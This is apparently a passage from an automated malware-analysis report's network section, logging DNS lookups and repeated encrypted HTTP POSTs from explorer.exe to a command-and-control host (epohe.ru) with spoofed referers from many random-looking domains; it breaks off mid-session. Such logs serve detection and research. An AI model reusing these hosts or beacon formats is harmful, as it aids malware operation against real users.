Sep 1, 2024 18:29:54.475922108 CEST	64030	53	192.168.2.4	1.1.1.1
Sep 1, 2024 18:29:55.494585037 CEST	64030	53	192.168.2.4	1.1.1.1
Sep 1, 2024 18:29:56.689873934 CEST	53	64030	1.1.1.1	192.168.2.4
Sep 1, 2024 18:29:56.689893007 CEST	53	64030	1.1.1.1	192.168.2.4
Sep 1, 2024 18:29:56.689903021 CEST	53	64030	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Sep 1, 2024 18:27:15.810333014 CEST	192.168.2.4	1.1.1.1	0xba7d	Standard query (0)	epohe.ru	A (IP address)	IN (0x0001)	false
Sep 1, 2024 18:27:16.804039955 CEST	192.168.2.4	1.1.1.1	0xba7d	Standard query (0)	epohe.ru	A (IP address)	IN (0x0001)	false
Sep 1, 2024 18:27:51.347188950 CEST	192.168.2.4	1.1.1.1	0x9eb5	Standard query (0)	ycMmBvpGeMcYHBMfFqkIrUsoh.ycMmBvpGeMcYHBMfFqkIrUsoh	A (IP address)	IN (0x0001)	false
Sep 1, 2024 18:27:57.972275019 CEST	192.168.2.4	1.1.1.1	0xdbdc	Standard query (0)	www.darkviolet-alpaca-923878.hostingersite.com	A (IP address)	IN (0x0001)	false
Sep 1, 2024 18:29:53.483686924 CEST	192.168.2.4	1.1.1.1	0x5a09	Standard query (0)	epohe.ru	A (IP address)	IN (0x0001)	false
Sep 1, 2024 18:29:54.475922108 CEST	192.168.2.4	1.1.1.1	0x5a09	Standard query (0)	epohe.ru	A (IP address)	IN (0x0001)	false
Sep 1, 2024 18:29:55.494585037 CEST	192.168.2.4	1.1.1.1	0x5a09	Standard query (0)	epohe.ru	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Sep 1, 2024 18:27:20.020844936 CEST	1.1.1.1	192.168.2.4	0xba7d	No error (0)	epohe.ru		185.12.79.25	A (IP address)	IN (0x0001)	false
Sep 1, 2024 18:27:20.020844936 CEST	1.1.1.1	192.168.2.4	0xba7d	No error (0)	epohe.ru		217.219.131.81	A (IP address)	IN (0x0001)	false
Sep 1, 2024 18:27:20.020844936 CEST	1.1.1.1	192.168.2.4	0xba7d	No error (0)	epohe.ru		2.185.214.11	A (IP address)	IN (0x0001)	false
Sep 1, 2024 18:27:20.020844936 CEST	1.1.1.1	192.168.2.4	0xba7d	No error (0)	epohe.ru		189.195.132.134	A (IP address)	IN (0x0001)	false
Sep 1, 2024 18:27:20.020844936 CEST	1.1.1.1	192.168.2.4	0xba7d	No error (0)	epohe.ru		191.191.224.16	A (IP address)	IN (0x0001)	false
Sep 1, 2024 18:27:20.020844936 CEST	1.1.1.1	192.168.2.4	0xba7d	No error (0)	epohe.ru		58.151.148.90	A (IP address)	IN (0x0001)	false
Sep 1, 2024 18:27:20.020844936 CEST	1.1.1.1	192.168.2.4	0xba7d	No error (0)	epohe.ru		151.233.51.166	A (IP address)	IN (0x0001)	false
Sep 1, 2024 18:27:20.020844936 CEST	1.1.1.1	192.168.2.4	0xba7d	No error (0)	epohe.ru		187.131.78.247	A (IP address)	IN (0x0001)	false
Sep 1, 2024 18:27:20.020844936 CEST	1.1.1.1	192.168.2.4	0xba7d	No error (0)	epohe.ru		196.189.156.245	A (IP address)	IN (0x0001)	false
Sep 1, 2024 18:27:20.020844936 CEST	1.1.1.1	192.168.2.4	0xba7d	No error (0)	epohe.ru		220.125.3.190	A (IP address)	IN (0x0001)	false
Sep 1, 2024 18:27:51.356708050 CEST	1.1.1.1	192.168.2.4	0x9eb5	Name error (3)	ycMmBvpGeMcYHBMfFqkIrUsoh.ycMmBvpGeMcYHBMfFqkIrUsoh	none	none	A (IP address)	IN (0x0001)	false
Sep 1, 2024 18:27:58.022819042 CEST	1.1.1.1	192.168.2.4	0xdbdc	No error (0)	www.darkviolet-alpaca-923878.hostingersite.com	free.cdn.hstgr.net		CNAME (Canonical name)	IN (0x0001)	false
Sep 1, 2024 18:27:58.022819042 CEST	1.1.1.1	192.168.2.4	0xdbdc	No error (0)	free.cdn.hstgr.net		84.32.84.144	A (IP address)	IN (0x0001)	false
Sep 1, 2024 18:29:56.689873934 CEST	1.1.1.1	192.168.2.4	0x5a09	No error (0)	epohe.ru		92.36.226.66	A (IP address)	IN (0x0001)	false
Sep 1, 2024 18:29:56.689873934 CEST	1.1.1.1	192.168.2.4	0x5a09	No error (0)	epohe.ru		186.145.236.93	A (IP address)	IN (0x0001)	false
Sep 1, 2024 18:29:56.689873934 CEST	1.1.1.1	192.168.2.4	0x5a09	No error (0)	epohe.ru		185.12.79.25	A (IP address)	IN (0x0001)	false
Sep 1, 2024 18:29:56.689873934 CEST	1.1.1.1	192.168.2.4	0x5a09	No error (0)	epohe.ru		151.233.51.166	A (IP address)	IN (0x0001)	false
Sep 1, 2024 18:29:56.689873934 CEST	1.1.1.1	192.168.2.4	0x5a09	No error (0)	epohe.ru		177.129.90.106	A (IP address)	IN (0x0001)	false
Sep 1, 2024 18:29:56.689873934 CEST	1.1.1.1	192.168.2.4	0x5a09	No error (0)	epohe.ru		211.181.24.132	A (IP address)	IN (0x0001)	false
Sep 1, 2024 18:29:56.689873934 CEST	1.1.1.1	192.168.2.4	0x5a09	No error (0)	epohe.ru		201.212.52.197	A (IP address)	IN (0x0001)	false
Sep 1, 2024 18:29:56.689873934 CEST	1.1.1.1	192.168.2.4	0x5a09	No error (0)	epohe.ru		190.218.247.16	A (IP address)	IN (0x0001)	false
Sep 1, 2024 18:29:56.689873934 CEST	1.1.1.1	192.168.2.4	0x5a09	No error (0)	epohe.ru		212.112.110.243	A (IP address)	IN (0x0001)	false
Sep 1, 2024 18:29:56.689873934 CEST	1.1.1.1	192.168.2.4	0x5a09	No error (0)	epohe.ru		197.164.156.210	A (IP address)	IN (0x0001)	false
Sep 1, 2024 18:29:56.689893007 CEST	1.1.1.1	192.168.2.4	0x5a09	No error (0)	epohe.ru		92.36.226.66	A (IP address)	IN (0x0001)	false
Sep 1, 2024 18:29:56.689893007 CEST	1.1.1.1	192.168.2.4	0x5a09	No error (0)	epohe.ru		186.145.236.93	A (IP address)	IN (0x0001)	false
Sep 1, 2024 18:29:56.689893007 CEST	1.1.1.1	192.168.2.4	0x5a09	No error (0)	epohe.ru		185.12.79.25	A (IP address)	IN (0x0001)	false
Sep 1, 2024 18:29:56.689893007 CEST	1.1.1.1	192.168.2.4	0x5a09	No error (0)	epohe.ru		151.233.51.166	A (IP address)	IN (0x0001)	false
Sep 1, 2024 18:29:56.689893007 CEST	1.1.1.1	192.168.2.4	0x5a09	No error (0)	epohe.ru		177.129.90.106	A (IP address)	IN (0x0001)	false
Sep 1, 2024 18:29:56.689893007 CEST	1.1.1.1	192.168.2.4	0x5a09	No error (0)	epohe.ru		211.181.24.132	A (IP address)	IN (0x0001)	false
Sep 1, 2024 18:29:56.689893007 CEST	1.1.1.1	192.168.2.4	0x5a09	No error (0)	epohe.ru		201.212.52.197	A (IP address)	IN (0x0001)	false
Sep 1, 2024 18:29:56.689893007 CEST	1.1.1.1	192.168.2.4	0x5a09	No error (0)	epohe.ru		190.218.247.16	A (IP address)	IN (0x0001)	false
Sep 1, 2024 18:29:56.689893007 CEST	1.1.1.1	192.168.2.4	0x5a09	No error (0)	epohe.ru		212.112.110.243	A (IP address)	IN (0x0001)	false
Sep 1, 2024 18:29:56.689893007 CEST	1.1.1.1	192.168.2.4	0x5a09	No error (0)	epohe.ru		197.164.156.210	A (IP address)	IN (0x0001)	false
Sep 1, 2024 18:29:56.689903021 CEST	1.1.1.1	192.168.2.4	0x5a09	No error (0)	epohe.ru		92.36.226.66	A (IP address)	IN (0x0001)	false
Sep 1, 2024 18:29:56.689903021 CEST	1.1.1.1	192.168.2.4	0x5a09	No error (0)	epohe.ru		186.145.236.93	A (IP address)	IN (0x0001)	false
Sep 1, 2024 18:29:56.689903021 CEST	1.1.1.1	192.168.2.4	0x5a09	No error (0)	epohe.ru		185.12.79.25	A (IP address)	IN (0x0001)	false
Sep 1, 2024 18:29:56.689903021 CEST	1.1.1.1	192.168.2.4	0x5a09	No error (0)	epohe.ru		151.233.51.166	A (IP address)	IN (0x0001)	false
Sep 1, 2024 18:29:56.689903021 CEST	1.1.1.1	192.168.2.4	0x5a09	No error (0)	epohe.ru		177.129.90.106	A (IP address)	IN (0x0001)	false
Sep 1, 2024 18:29:56.689903021 CEST	1.1.1.1	192.168.2.4	0x5a09	No error (0)	epohe.ru		211.181.24.132	A (IP address)	IN (0x0001)	false
Sep 1, 2024 18:29:56.689903021 CEST	1.1.1.1	192.168.2.4	0x5a09	No error (0)	epohe.ru		201.212.52.197	A (IP address)	IN (0x0001)	false
Sep 1, 2024 18:29:56.689903021 CEST	1.1.1.1	192.168.2.4	0x5a09	No error (0)	epohe.ru		190.218.247.16	A (IP address)	IN (0x0001)	false
Sep 1, 2024 18:29:56.689903021 CEST	1.1.1.1	192.168.2.4	0x5a09	No error (0)	epohe.ru		212.112.110.243	A (IP address)	IN (0x0001)	false
Sep 1, 2024 18:29:56.689903021 CEST	1.1.1.1	192.168.2.4	0x5a09	No error (0)	epohe.ru		197.164.156.210	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.darkviolet-alpaca-923878.hostingersite.com

jxryfrjxsorxwjj.com

epohe.ru

xouvxevpvfhdcpc.com

dptscqqdhur.org

ghurgdhnjdbs.org

eomonrjgivp.net

tfboypyaorl.org

keyrnfkvwmhnea.org

iiljonexjcrmdmr.net

ohihtgeokdjeoq.com

anncymmtliu.net

nfbvcbcncqhv.net

satmkqimawvad.net

miyyqevbsjlggoqi.com

wjbrpavmolinjj.net

npckjykexnsqtkej.com

erkclgyfkkojaq.com

ffhtwsclnkg.com

rkcekbquuaot.com

94.228.169.44

tofeflnxucwecrre.net

txqhuiqicbyfe.org

ymvbvdmfmfqso.com

ayhvajmivgmmac.net

sedmabhbgvobvj.org

vholdxjhiek.com

bvfaiaplegbqsb.net

eqstqyhldwdanxk.org

ntuywdodepqxw.net

gjyoldehyuuov.org

pasvtjgoedtsb.com

rhvpemocona.net

jskidlnulxlha.net

91.202.233.158

ynijbmhqiplny.net

unrxkwkfeyhj.org

vqiayymywrc.com

itpinyokimroq.net

ojmxnklvhubca.net

kxswswyeekbt.org

ypumfgujjpamw.org

tpbwkwmjyyc.com

uggrlskcswn.org

ksuubhamvjulqde.com

dauyrhmxccbsrgk.com

dgvopxagbvtq.com

dkyucoyaekdk.org

aipiphxycclwh.net

nbvjehgoajlapmsg.net

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	56142	191.191.224.16	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 18:27:21.050909996 CEST	272	OUT	POST /tmp/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://jxryfrjxsorxwjj.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 124 Host: epohe.ru
Sep 1, 2024 18:27:21.050935984 CEST	124	OUT	Data Raw: 3b 6e 21 16 f7 bb 1d 53 d6 a3 c8 70 0e 70 7f cc 7c 0b ba e2 6f 05 90 63 0c 7a 73 97 48 cb b2 6d 9f 29 c1 2f 06 6d 24 11 ed 9e 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 3f 50 ac 98 Data Ascii: ;n!Spp\|oczsHm)/m$? 9Yt M@NA .[k,vu?PGBz}H<S(#k
Sep 1, 2024 18:27:22.306963921 CEST	152	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 01 Sep 2024 16:27:22 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 04 00 00 00 72 e8 86 e4 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	56143	191.191.224.16	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 18:27:22.316498041 CEST	272	OUT	POST /tmp/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://xouvxevpvfhdcpc.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 192 Host: epohe.ru
Sep 1, 2024 18:27:22.316523075 CEST	192	OUT	Data Raw: 3b 6e 21 16 f7 bb 1d 53 d6 a3 c8 70 0e 70 7f cc 7c 0b ba e2 6f 05 90 63 0c 7a 73 97 48 cb b2 6d 9f 29 c1 2f 06 6d 24 11 ed 9e 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0a 6b 2c 90 f5 76 0b 75 62 0e f1 85 Data Ascii: ;n!Spp\|oczsHm)/m$? 9Yt M@NA -[k,vub7iUcxTj\MYsXBt[\=>N;Z B{1;P6CZ!4v!^J
Sep 1, 2024 18:27:23.580741882 CEST	475	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 01 Sep 2024 16:27:23 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	56144	191.191.224.16	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 18:27:23.588857889 CEST	268	OUT	POST /tmp/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://dptscqqdhur.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 150 Host: epohe.ru
Sep 1, 2024 18:27:23.588879108 CEST	150	OUT	Data Raw: 3b 6e 21 16 f7 bb 1d 53 d6 a3 c8 70 0e 70 7f cc 7c 0b ba e2 6f 05 90 63 0c 7a 73 97 48 cb b2 6d 9f 29 c1 2f 06 6d 24 11 ed 9e 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0b 6b 2c 90 f5 76 0b 75 51 2b fe a3 Data Ascii: ;n!Spp\|oczsHm)/m$? 9Yt M@NA -[k,vuQ+[Uu^vM5pkPazCZH!*.G]#AZqLvMv
Sep 1, 2024 18:27:24.857227087 CEST	475	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 01 Sep 2024 16:27:24 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	56145	191.191.224.16	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 18:27:24.866756916 CEST	269	OUT	POST /tmp/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://ghurgdhnjdbs.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 367 Host: epohe.ru
Sep 1, 2024 18:27:24.866787910 CEST	367	OUT	Data Raw: 3b 6e 21 16 f7 bb 1d 53 d6 a3 c8 70 0e 70 7f cc 7c 0b ba e2 6f 05 90 63 0c 7a 73 97 48 cb b2 6d 9f 29 c1 2f 06 6d 24 11 ed 9e 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 08 6b 2c 90 f5 76 0b 75 59 54 e5 89 Data Ascii: ;n!Spp\|oczsHm)/m$? 9Yt M@NA -[k,vuYTlL\AiW2h<W1tRW#M#/#4ks(,B)J Ty?e{juo=U[0'`'XI<W:-e
Sep 1, 2024 18:27:26.372167110 CEST	475	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 01 Sep 2024 16:27:25 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Sep 1, 2024 18:27:26.372409105 CEST	475	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 01 Sep 2024 16:27:25 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	56146	191.191.224.16	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 18:27:26.380178928 CEST	268	OUT	POST /tmp/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://eomonrjgivp.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 137 Host: epohe.ru
Sep 1, 2024 18:27:26.380196095 CEST	137	OUT	Data Raw: 3b 6e 21 16 f7 bb 1d 53 d6 a3 c8 70 0e 70 7f cc 7c 0b ba e2 6f 05 90 63 0c 7a 73 97 48 cb b2 6d 9f 29 c1 2f 06 6d 24 11 ed 9e 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 09 6b 2c 90 f5 76 0b 75 3a 21 a2 fb Data Ascii: ;n!Spp\|oczsHm)/m$? 9Yt M@NA -[k,vu:!SPevD{33=%D>Y9s6
Sep 1, 2024 18:27:27.965471029 CEST	475	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 01 Sep 2024 16:27:27 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Sep 1, 2024 18:27:27.965965033 CEST	475	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 01 Sep 2024 16:27:27 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	56147	191.191.224.16	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 18:27:27.973150969 CEST	268	OUT	POST /tmp/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://tfboypyaorl.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 175 Host: epohe.ru
